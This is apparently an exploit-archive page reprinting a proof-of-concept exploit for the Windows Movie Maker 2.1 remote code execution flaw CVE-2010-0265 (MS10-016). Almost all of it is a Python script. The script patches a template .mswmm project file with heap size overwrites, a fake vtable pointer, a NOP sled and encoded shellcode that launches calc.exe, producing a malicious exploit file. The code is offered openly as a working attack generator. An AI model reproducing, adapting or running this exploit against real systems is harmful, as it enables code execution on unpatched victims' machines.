Movie Maker Remote Code Execution (MS10-016)

Exploit Code :

'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < Day 4
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/

http://www.exploit-db.com/movie-maker-remote-code-execution-ms10-016/

http://www.exploit-db.com/sploits/Movie-Maker-Remote-Code-Execution-Exploit
.zip

Title : Movie Maker Remote Code Execution (MS10-016)
Version : moviemk.exe 2.1 (XP SP3)
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : Ciritical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-0265

'''

# Exploit for CVE-2010-0265
# Tested on Windows XP SP3( Movie Maker 2.1 )

import sys

def main():

try:
fdR = open('src.mswmm', 'rb+')
strTotal = fdR.read()
str1 = strTotal[:9976]
str2 = strTotal[9980:10104]
str3 = strTotal[10108:16496]
str4 = strTotal[17620:]

size_first_new = "\x20\x00\x00\x00" # size of first new()
size_second_new = "\x11\x11\x00\x00" # size of second new()

p2p = "\x71\xb5\x06\x77" # vtable fake pointer from resource section
COMRes -8 to jmp EBX

# shellcode calc.exe
shellcode =
'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\xeb\x00\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\
x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x44\x58\x50\x30
\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x41\x42\x32\x42\x41\x30\x42\x41\x58\x4
1\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x4b\x58\x51\x54\x65\x50\x57\x70\x45\x
50\x4e\x6b\x67\x35\x35\x6c\x4e\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\
x6c\x4b\x52\x6f\x46\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x49\x6c
\x4b\x54\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x39\x4c\x6c\x4d\x5
4\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x4d\x63\x31\x79\x52\x4a\x4b\x
69\x64\x67\x4b\x32\x74\x65\x74\x66\x64\x31\x65\x4a\x45\x6c\x4b\x71\x4f\x31\
x34\x57\x71\x48\x6b\x52\x46\x6e\x6b\x64\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c
\x54\x41\x68\x6b\x4c\x4b\x57\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x6
5\x74\x67\x74\x4a\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x30\x4f\x
75\x4f\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x4b\x70\x70\x57\x6c\
x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x69\x6c\x4b\x4d\x50\x4c\x70\x67
\x70\x75\x50\x37\x70\x4c\x4b\x45\x38\x35\x6c\x41\x4f\x57\x41\x68\x76\x53\x5
0\x30\x56\x6e\x69\x6b\x48\x6f\x73\x6f\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x
6f\x7a\x57\x74\x51\x4f\x45\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\
x6f\x38\x67\x73\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x78\x70\x65
\x45\x50\x44'

if len(shellcode) > 1120:
print "[*] Error : Shellcode length is long"
return
if len(shellcode) <= 1120:
dif = 1120- len(shellcode)
while dif > 0 :
shellcode += '\x90'
dif = dif - 1

fdW= open('exploit.mswmm', 'wb+')
fdW.write(str1)
fdW.write(size_first_new)
fdW.write(str2)
fdW.write(size_second_new)
fdW.write(str3)
fdW.write(p2p)
fdW.write('\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90') #
padding
fdW.write(shellcode)
fdW.write(str4)

fdW.close()
fdR.close()
print '[-] Movie Maker file(.MSWMM) generated'
except IOError:
print '[*] Error : An IO error has occurred'
print '[-] Exiting ...'
sys.exit(-1)

if __name__ == '__main__':
main()

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason